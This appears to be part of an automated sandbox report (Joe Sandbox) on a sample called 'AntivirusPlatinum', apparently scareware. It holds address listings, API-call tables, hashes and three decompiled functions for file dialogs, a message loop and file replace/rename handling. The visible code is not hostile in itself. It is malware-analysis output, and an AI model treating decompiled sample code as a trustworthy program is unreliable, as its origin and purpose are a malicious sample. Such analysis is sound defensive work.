                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c78e
                                                                                                                                                      0x0040c78e
                                                                                                                                                      0x0040c792
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c798
                                                                                                                                                      0x0040c798
                                                                                                                                                      0x0040c7a0
                                                                                                                                                      0x0040c7a5
                                                                                                                                                      0x0040c7a5
                                                                                                                                                      0x0040c7a8
                                                                                                                                                      0x0040c7cd
                                                                                                                                                      0x0040c7aa
                                                                                                                                                      0x0040c7aa
                                                                                                                                                      0x0040c7aa
                                                                                                                                                      0x0040c7ad
                                                                                                                                                      0x0040c7c4
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c7b0
                                                                                                                                                      0x0040c7bb
                                                                                                                                                      0x0040c7b2
                                                                                                                                                      0x0040c7b2
                                                                                                                                                      0x0040c7b2
                                                                                                                                                      0x0040c7b0
                                                                                                                                                      0x0040c7ad
                                                                                                                                                      0x0040c7db
                                                                                                                                                      0x0040c7e2
                                                                                                                                                      0x0040c7e9
                                                                                                                                                      0x0040c7f0
                                                                                                                                                      0x0040c7f5
                                                                                                                                                      0x0040c7fc
                                                                                                                                                      0x0040c83d
                                                                                                                                                      0x0040c846
                                                                                                                                                      0x0040c84b
                                                                                                                                                      0x0040c84d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c84f
                                                                                                                                                      0x0040c84f
                                                                                                                                                      0x0040c851
                                                                                                                                                      0x0040c858
                                                                                                                                                      0x0040c85e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x0040c862
                                                                                                                                                      0x0040c865
                                                                                                                                                      0x0040c86c
                                                                                                                                                      0x0040c86e
                                                                                                                                                      0x0040c875
                                                                                                                                                      0x0040c878
                                                                                                                                                      0x0040c87d
                                                                                                                                                      0x0040c87f
                                                                                                                                                      0x0040c8b1
                                                                                                                                                      0x0040c8b1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c8b1
                                                                                                                                                      0x0040c881
                                                                                                                                                      0x0040c881
                                                                                                                                                      0x0040c883
                                                                                                                                                      0x0040c886
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x0040c89b
                                                                                                                                                      0x0040c89b
                                                                                                                                                      0x0040c8a0
                                                                                                                                                      0x0040c8a1
                                                                                                                                                      0x0040c8a7
                                                                                                                                                      0x0040c8a7
                                                                                                                                                      0x0040c8a8
                                                                                                                                                      0x0040c8ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c8ad
                                                                                                                                                      0x0040c888
                                                                                                                                                      0x0040c888
                                                                                                                                                      0x0040c888
                                                                                                                                                      0x0040c88b
                                                                                                                                                      0x0040c88c
                                                                                                                                                      0x0040c892
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c892
                                                                                                                                                      0x0040c867
                                                                                                                                                      0x0040c867
                                                                                                                                                      0x0040c86a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c8b3
                                                                                                                                                      0x0040c8b3
                                                                                                                                                      0x0040c8b4
                                                                                                                                                      0x0040c8b4
                                                                                                                                                      0x0040c8b9
                                                                                                                                                      0x0040c8bb
                                                                                                                                                      0x0040c8bd
                                                                                                                                                      0x0040c8bd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c7fe
                                                                                                                                                      0x0040c7fe
                                                                                                                                                      0x0040c805
                                                                                                                                                      0x0040c813
                                                                                                                                                      0x0040c81a
                                                                                                                                                      0x0040c81f
                                                                                                                                                      0x0040c821
                                                                                                                                                      0x0040c827
                                                                                                                                                      0x0040c833
                                                                                                                                                      0x0040c833
                                                                                                                                                      0x0040c8c0
                                                                                                                                                      0x0040c8c0
                                                                                                                                                      0x0040c8c7
                                                                                                                                                      0x0040c8d0
                                                                                                                                                      0x0040c8d7
                                                                                                                                                      0x0040c8d7
                                                                                                                                                      0x0040c8e3
                                                                                                                                                      0x0040c8f2
                                                                                                                                                      0x0040c8f9
                                                                                                                                                      0x0040c905
                                                                                                                                                      0x0040c90a
                                                                                                                                                      0x0040c911
                                                                                                                                                      0x0040c91a
                                                                                                                                                      0x0040c926
                                                                                                                                                      0x0040c92d
                                                                                                                                                      0x0040c92d
                                                                                                                                                      0x0040c939
                                                                                                                                                      0x0040c940
                                                                                                                                                      0x0040c945
                                                                                                                                                      0x0040c94c
                                                                                                                                                      0x0040c952
                                                                                                                                                      0x0040c954
                                                                                                                                                      0x0040c954
                                                                                                                                                      0x0040c968
                                                                                                                                                      0x0040c96d
                                                                                                                                                      0x0040c974
                                                                                                                                                      0x0040c979
                                                                                                                                                      0x0040c97b
                                                                                                                                                      0x0040c98c
                                                                                                                                                      0x0040c998
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c97d
                                                                                                                                                      0x0040c97d
                                                                                                                                                      0x0040c983
                                                                                                                                                      0x0040c988
                                                                                                                                                      0x0040c98a
                                                                                                                                                      0x0040c99d
                                                                                                                                                      0x0040c9a8
                                                                                                                                                      0x0040c9b4
                                                                                                                                                      0x0040c9b6
                                                                                                                                                      0x0040c9b8
                                                                                                                                                      0x0040c9c1
                                                                                                                                                      0x0040c9c8
                                                                                                                                                      0x0040c9ca
                                                                                                                                                      0x0040c9cc
                                                                                                                                                      0x0040c9d5
                                                                                                                                                      0x0040c9dc
                                                                                                                                                      0x0040c9de
                                                                                                                                                      0x0040c9e0
                                                                                                                                                      0x0040c9e9
                                                                                                                                                      0x0040c9f7
                                                                                                                                                      0x0040c9fc
                                                                                                                                                      0x0040ca03
                                                                                                                                                      0x0040ca07
                                                                                                                                                      0x0040ca15
                                                                                                                                                      0x0040ca15
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ca03
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c98a
                                                                                                                                                      0x0040c97b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ca1d
                                                                                                                                                      0x0040ca1d
                                                                                                                                                      0x0040ca21
                                                                                                                                                      0x0040ca23
                                                                                                                                                      0x0040ca23
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c563
                                                                                                                                                      0x0040c568
                                                                                                                                                      0x0040c56b
                                                                                                                                                      0x0040c591
                                                                                                                                                      0x0040c56d
                                                                                                                                                      0x0040c56d
                                                                                                                                                      0x0040c570
                                                                                                                                                      0x0040c585
                                                                                                                                                      0x0040c572
                                                                                                                                                      0x0040c572
                                                                                                                                                      0x0040c579
                                                                                                                                                      0x0040c579
                                                                                                                                                      0x0040c570
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c008
                                                                                                                                                      0x0040c00c
                                                                                                                                                      0x0040c011
                                                                                                                                                      0x0040c018
                                                                                                                                                      0x0040c018
                                                                                                                                                      0x0040c01b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c01d
                                                                                                                                                      0x0040c01d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c01d
                                                                                                                                                      0x0040c01b
                                                                                                                                                      0x0040ca58
                                                                                                                                                      0x0040ca5c
                                                                                                                                                      0x0040ca5c
                                                                                                                                                      0x0040c63b
                                                                                                                                                      0x0040c642
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c648
                                                                                                                                                      0x0040c64a
                                                                                                                                                      0x0040c651
                                                                                                                                                      0x0040c658
                                                                                                                                                      0x0040c65f
                                                                                                                                                      0x0040c69f
                                                                                                                                                      0x0040c6a6
                                                                                                                                                      0x0040c6af
                                                                                                                                                      0x0040c6bb
                                                                                                                                                      0x0040c6c9
                                                                                                                                                      0x0040c6c9
                                                                                                                                                      0x0040c6d5
                                                                                                                                                      0x0040c6e3
                                                                                                                                                      0x0040c6ed
                                                                                                                                                      0x0040c6f4
                                                                                                                                                      0x0040c6fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c703
                                                                                                                                                      0x0040c703
                                                                                                                                                      0x0040c705
                                                                                                                                                      0x0040c70a
                                                                                                                                                      0x0040c711
                                                                                                                                                      0x0040c716
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c716
                                                                                                                                                      0x0040c6fd
                                                                                                                                                      0x0040c661
                                                                                                                                                      0x0040c661
                                                                                                                                                      0x0040c66a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c66c
                                                                                                                                                      0x0040c66c
                                                                                                                                                      0x0040c674
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c676
                                                                                                                                                      0x0040c676
                                                                                                                                                      0x0040c67f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x0040c683
                                                                                                                                                      0x0040c68b
                                                                                                                                                      0x0040c692
                                                                                                                                                      0x0040c697
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c71c
                                                                                                                                                      0x0040c720
                                                                                                                                                      0x0040c72d
                                                                                                                                                      0x0040c72f
                                                                                                                                                      0x0040c72f
                                                                                                                                                      0x0040c739
                                                                                                                                                      0x0040c739
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c720

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DialogItemMessagePathTempText
                                                                                                                                                      • String ID: %s%s%d$@
                                                                                                                                                      • API String ID: 2494799851-3206671281
                                                                                                                                                      • Opcode ID: b60175ef51fccfefb6d42f0a9252ebfaf611be2a1e8d9d8e576f50eb8e4d0200
                                                                                                                                                      • Instruction ID: 60ff87052d5ec9c8cb07c29fa8386008fa4b4f1150e87128aeb403cb9a6e3690
                                                                                                                                                      • Opcode Fuzzy Hash: b60175ef51fccfefb6d42f0a9252ebfaf611be2a1e8d9d8e576f50eb8e4d0200
                                                                                                                                                      • Instruction Fuzzy Hash: CE416D7190525CEEEB21EBA0CD88FDA77ACAB04304F0085B6E509E2190D7B99B89CF55
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E00402854(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, char _a20) {
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				CHAR* _v36;
                                                                                                                                                      				long _v48;
                                                                                                                                                      				char* _v52;
                                                                                                                                                      				char* _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                      				char _v80;
                                                                                                                                                      				char _v592;
                                                                                                                                                      				char _v1616;
                                                                                                                                                      				void* _t39;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				signed int _t48;
                                                                                                                                                      				void* _t61;
                                                                                                                                                      				signed int _t63;
                                                                                                                                                      				void* _t65;
                                                                                                                                                      				char _t66;
                                                                                                                                                      				char* _t67;
                                                                                                                                                      				void* _t68;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				signed int _t76;
                                                                                                                                                      
                                                                                                                                                      				_t64 =  &_v592;
                                                                                                                                                      				if(_a16 != 0) {
                                                                                                                                                      					E0040A477( &_v592, _a16);
                                                                                                                                                      					_t68 = _t69 + E0040A384(_t61,  &_v592) - 0x24b;
                                                                                                                                                      					E0040A477(_t68, _a16);
                                                                                                                                                      					_t64 = _t68 + E0040A384(_t61, _t68) + 1;
                                                                                                                                                      				}
                                                                                                                                                      				E0040A477(_t64, E004098F7(0x85));
                                                                                                                                                      				_t65 = _t64 + E0040A384(_t61, _t64) + 1;
                                                                                                                                                      				E0040A477(_t65, 0x4122d4);
                                                                                                                                                      				_t39 = E0040A384(_t61, _t65);
                                                                                                                                                      				 *((char*)(_t39 + _t65 + 1)) = 0;
                                                                                                                                                      				_t66 = 0x4c;
                                                                                                                                                      				E0040A289(_t61,  &_v80, 0, _t66);
                                                                                                                                                      				_v76 = _a4;
                                                                                                                                                      				_t43 =  *0x414c78; // 0x400000
                                                                                                                                                      				_v72 = _t43;
                                                                                                                                                      				_v80 = _t66;
                                                                                                                                                      				_t67 = _a12;
                                                                                                                                                      				_v68 =  &_v592;
                                                                                                                                                      				_v52 = _t67;
                                                                                                                                                      				_v48 = 0x400;
                                                                                                                                                      				_v32 = _a8;
                                                                                                                                                      				if(E004073DB(_t67) == _t67) {
                                                                                                                                                      					GetCurrentDirectoryA(0x400,  &_v1616);
                                                                                                                                                      					_v36 =  &_v1616;
                                                                                                                                                      				}
                                                                                                                                                      				_v28 = 0x1080c;
                                                                                                                                                      				_push( &_v80);
                                                                                                                                                      				if(_a20 == 0) {
                                                                                                                                                      					_t48 = GetOpenFileNameA();
                                                                                                                                                      				} else {
                                                                                                                                                      					_t48 = GetSaveFileNameA();
                                                                                                                                                      				}
                                                                                                                                                      				_t63 = _t48;
                                                                                                                                                      				if(_t63 == 0) {
                                                                                                                                                      					_t48 = CommDlgExtendedError();
                                                                                                                                                      					if(_t48 == 0x3002) {
                                                                                                                                                      						 *_t67 = 0;
                                                                                                                                                      						_push( &_v80);
                                                                                                                                                      						if(_a20 == 0) {
                                                                                                                                                      							_t48 = GetOpenFileNameA();
                                                                                                                                                      						} else {
                                                                                                                                                      							_t48 = GetSaveFileNameA();
                                                                                                                                                      						}
                                                                                                                                                      						_t63 = _t48;
                                                                                                                                                      					}
                                                                                                                                                      					_t76 = _t63;
                                                                                                                                                      				}
                                                                                                                                                      				return _t48 & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                      			}

























                                                                                                                                                      0x00402864
                                                                                                                                                      0x0040286a
                                                                                                                                                      0x00402872
                                                                                                                                                      0x00402882
                                                                                                                                                      0x0040288a
                                                                                                                                                      0x00402895
                                                                                                                                                      0x00402895
                                                                                                                                                      0x004028a5
                                                                                                                                                      0x004028b0
                                                                                                                                                      0x004028ba
                                                                                                                                                      0x004028c0
                                                                                                                                                      0x004028c7
                                                                                                                                                      0x004028cc
                                                                                                                                                      0x004028d4
                                                                                                                                                      0x004028dc
                                                                                                                                                      0x004028df
                                                                                                                                                      0x004028e4
                                                                                                                                                      0x004028ed
                                                                                                                                                      0x004028f0
                                                                                                                                                      0x004028f3
                                                                                                                                                      0x004028ff
                                                                                                                                                      0x00402902
                                                                                                                                                      0x00402905
                                                                                                                                                      0x0040290f
                                                                                                                                                      0x00402919
                                                                                                                                                      0x00402925
                                                                                                                                                      0x00402925
                                                                                                                                                      0x00402935
                                                                                                                                                      0x0040293c
                                                                                                                                                      0x0040293d
                                                                                                                                                      0x00402947
                                                                                                                                                      0x0040293f
                                                                                                                                                      0x0040293f
                                                                                                                                                      0x0040293f
                                                                                                                                                      0x00402949
                                                                                                                                                      0x0040294d
                                                                                                                                                      0x0040294f
                                                                                                                                                      0x0040295a
                                                                                                                                                      0x00402963
                                                                                                                                                      0x00402966
                                                                                                                                                      0x00402967
                                                                                                                                                      0x00402971
                                                                                                                                                      0x00402969
                                                                                                                                                      0x00402969
                                                                                                                                                      0x00402969
                                                                                                                                                      0x00402973
                                                                                                                                                      0x00402973
                                                                                                                                                      0x00402975
                                                                                                                                                      0x00402975
                                                                                                                                                      0x0040297e

                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000400,?,?,?,00000000,0000004C,?,?,004122D4,?,?,00000000,00000085,?,?), ref: 00402919
                                                                                                                                                      • GetSaveFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122D4,?,?,00000000,00000085,?,?), ref: 0040293F
                                                                                                                                                      • GetOpenFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122D4,?,?,00000000,00000085,?,?), ref: 00402947
                                                                                                                                                      • CommDlgExtendedError.COMDLG32 ref: 0040294F
                                                                                                                                                      • GetSaveFileNameA.COMDLG32(?), ref: 00402969
                                                                                                                                                      • GetOpenFileNameA.COMDLG32(?), ref: 00402971
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileName$OpenSave$CommCurrentDirectoryErrorExtended
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1809602070-0
                                                                                                                                                      • Opcode ID: 6245d7889aa86965bb41dfc6eb2fa2d3cf87c008a1edef2314fa0fcf31d269f6
                                                                                                                                                      • Instruction ID: ff30afd232e3d8f3ba4cc359dfcf402cea8e18d8be24ab53ae8b2113f52266a8
                                                                                                                                                      • Opcode Fuzzy Hash: 6245d7889aa86965bb41dfc6eb2fa2d3cf87c008a1edef2314fa0fcf31d269f6
                                                                                                                                                      • Instruction Fuzzy Hash: 8F31B3B59012199BCB11EFA5C949FDE7BB8AF04314F104026FD44F3281C7789955CBAA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                      			E004064FD(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				long _v16;
                                                                                                                                                      				struct tagMSG _v44;
                                                                                                                                                      				long _t24;
                                                                                                                                                      				intOrPtr* _t29;
                                                                                                                                                      				intOrPtr* _t32;
                                                                                                                                                      				intOrPtr* _t34;
                                                                                                                                                      				intOrPtr* _t36;
                                                                                                                                                      				struct HWND__* _t46;
                                                                                                                                                      				intOrPtr* _t53;
                                                                                                                                                      
                                                                                                                                                      				_t46 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_t24 = GetTickCount();
                                                                                                                                                      				_t53 = _a4;
                                                                                                                                                      				_v16 = _t24;
                                                                                                                                                      				while(1) {
                                                                                                                                                      					_push( &_v12);
                                                                                                                                                      					_push(_t53);
                                                                                                                                                      					if( *((intOrPtr*)( *_t53 + 0x48))() >= 0 && _v12 != _t46) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					if(GetTickCount() - _v16 > 0x2710) {
                                                                                                                                                      						break;
                                                                                                                                                      					} else {
                                                                                                                                                      						if(PeekMessageA( &_v44, _t46, _t46, _t46, _t46) != 0) {
                                                                                                                                                      							GetMessageA( &_v44, _t46, _t46, _t46);
                                                                                                                                                      							TranslateMessage( &_v44);
                                                                                                                                                      							DispatchMessageA( &_v44);
                                                                                                                                                      						}
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t29 = _v12;
                                                                                                                                                      				if(_t29 != _t46) {
                                                                                                                                                      					_push( &_v8);
                                                                                                                                                      					_push(0x41282c);
                                                                                                                                                      					_push(_t29);
                                                                                                                                                      					if( *((intOrPtr*)( *_t29))() >= 0) {
                                                                                                                                                      						_t32 = _v8;
                                                                                                                                                      						_push(_t32);
                                                                                                                                                      						if( *((intOrPtr*)( *_t32 + 0x20))() >= 0) {
                                                                                                                                                      							_t36 = _v8;
                                                                                                                                                      							_t46 = _t46 & 0xffffff00 |  *((intOrPtr*)( *_t36 + 0x14))(_t36, _a8) >= 0x00000000;
                                                                                                                                                      						}
                                                                                                                                                      						_t34 = _v8;
                                                                                                                                                      						 *((intOrPtr*)( *_t34 + 8))(_t34);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t46;
                                                                                                                                                      			}














                                                                                                                                                      0x0040650b
                                                                                                                                                      0x0040650e
                                                                                                                                                      0x00406511
                                                                                                                                                      0x00406514
                                                                                                                                                      0x00406516
                                                                                                                                                      0x00406519
                                                                                                                                                      0x0040651c
                                                                                                                                                      0x00406521
                                                                                                                                                      0x00406522
                                                                                                                                                      0x00406528
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406539
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040653b
                                                                                                                                                      0x0040654b
                                                                                                                                                      0x00406554
                                                                                                                                                      0x0040655e
                                                                                                                                                      0x00406568
                                                                                                                                                      0x00406568
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040654b
                                                                                                                                                      0x00406539
                                                                                                                                                      0x00406570
                                                                                                                                                      0x00406575
                                                                                                                                                      0x0040657c
                                                                                                                                                      0x0040657d
                                                                                                                                                      0x00406582
                                                                                                                                                      0x00406587
                                                                                                                                                      0x00406589
                                                                                                                                                      0x0040658e
                                                                                                                                                      0x00406594
                                                                                                                                                      0x00406596
                                                                                                                                                      0x004065a4
                                                                                                                                                      0x004065a4
                                                                                                                                                      0x004065a7
                                                                                                                                                      0x004065ad
                                                                                                                                                      0x004065ad
                                                                                                                                                      0x00406587
                                                                                                                                                      0x004065b6

                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406514
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040652F
                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00406543
                                                                                                                                                      • GetMessageA.USER32 ref: 00406554
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0040655E
                                                                                                                                                      • DispatchMessageA.USER32 ref: 00406568
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$CountTick$DispatchPeekTranslate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3906477200-0
                                                                                                                                                      • Opcode ID: de4563fddac7f047d422ea89b0fca390a86d69ec7808a870bafdc2c2368130f6
                                                                                                                                                      • Instruction ID: 4ec5337514138466832f045ad94f732bf95921bc87828c57aa0924f33fa4e90b
                                                                                                                                                      • Opcode Fuzzy Hash: de4563fddac7f047d422ea89b0fca390a86d69ec7808a870bafdc2c2368130f6
                                                                                                                                                      • Instruction Fuzzy Hash: 1821E4B1A00109AFDB00DFA5DD88DDEBBBCEE48305B1444AAE502E7294D778DA51CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BB8A(char* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                      				int _t14;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				char* _t19;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				char* _t23;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				char* _t26;
                                                                                                                                                      
                                                                                                                                                      				while(1) {
                                                                                                                                                      					 *0x419ee0 = _a12;
                                                                                                                                                      					 *0x419ee4 = _a16;
                                                                                                                                                      					 *0x419ed8 = _a20;
                                                                                                                                                      					if( *0x419ede == 0) {
                                                                                                                                                      						if( *0x419edf == 0) {
                                                                                                                                                      							_t14 = DialogBoxParamA( *0x414c74, "REPLACEFILEDLG",  *0x419f80, E0040AE97, _a8);
                                                                                                                                                      						} else {
                                                                                                                                                      							_t14 = 2;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t14 = 1;
                                                                                                                                                      					}
                                                                                                                                                      					_t15 = _t14 - 1;
                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_t18 = _t15 - 1;
                                                                                                                                                      					if(_t18 == 0) {
                                                                                                                                                      						L15:
                                                                                                                                                      						_t19 = _a4;
                                                                                                                                                      						 *_t19 = 0x4e;
                                                                                                                                                      						return _t19;
                                                                                                                                                      					}
                                                                                                                                                      					_t20 = _t18 - 1;
                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                      						 *0x419ede = 1;
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_t21 = _t20 - 1;
                                                                                                                                                      					if(_t21 != 0) {
                                                                                                                                                      						_t22 = _t21 - 1;
                                                                                                                                                      						if(_t22 == 0) {
                                                                                                                                                      							_t23 = _a4;
                                                                                                                                                      							 *0x419f78 = 1;
                                                                                                                                                      							 *_t23 = 0x43;
                                                                                                                                                      							return _t23;
                                                                                                                                                      						}
                                                                                                                                                      						_t24 = _t22 - 1;
                                                                                                                                                      						if(_t24 != 0) {
                                                                                                                                                      							return _t24;
                                                                                                                                                      						}
                                                                                                                                                      						 *0x419edf = 1;
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					if(DialogBoxParamA( *0x414c74, "RENAMEDLG",  *0x419f80, E0040B193, _a8) == 0) {
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      					_t26 = _a4;
                                                                                                                                                      					 *_t26 = 0x52;
                                                                                                                                                      					return _t26;
                                                                                                                                                      				}
                                                                                                                                                      				 *_a4 = 0x59;
                                                                                                                                                      				return SetFileAttributesA(_a8, 0);
                                                                                                                                                      			}













                                                                                                                                                      0x0040bb94
                                                                                                                                                      0x0040bb9e
                                                                                                                                                      0x0040bba6
                                                                                                                                                      0x0040bbae
                                                                                                                                                      0x0040bbb3
                                                                                                                                                      0x0040bbc1
                                                                                                                                                      0x0040bbe1
                                                                                                                                                      0x0040bbc3
                                                                                                                                                      0x0040bbc5
                                                                                                                                                      0x0040bbc5
                                                                                                                                                      0x0040bbb5
                                                                                                                                                      0x0040bbb7
                                                                                                                                                      0x0040bbb7
                                                                                                                                                      0x0040bbe3
                                                                                                                                                      0x0040bbe4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bbe6
                                                                                                                                                      0x0040bbe7
                                                                                                                                                      0x0040bc23
                                                                                                                                                      0x0040bc23
                                                                                                                                                      0x0040bc26
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bc26
                                                                                                                                                      0x0040bbe9
                                                                                                                                                      0x0040bbea
                                                                                                                                                      0x0040bc3d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bc3d
                                                                                                                                                      0x0040bbec
                                                                                                                                                      0x0040bbed
                                                                                                                                                      0x0040bc16
                                                                                                                                                      0x0040bc17
                                                                                                                                                      0x0040bc2b
                                                                                                                                                      0x0040bc2e
                                                                                                                                                      0x0040bc38
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bc38
                                                                                                                                                      0x0040bc19
                                                                                                                                                      0x0040bc1a
                                                                                                                                                      0x0040bc57
                                                                                                                                                      0x0040bc57
                                                                                                                                                      0x0040bc1c
                                                                                                                                                      0x00000000
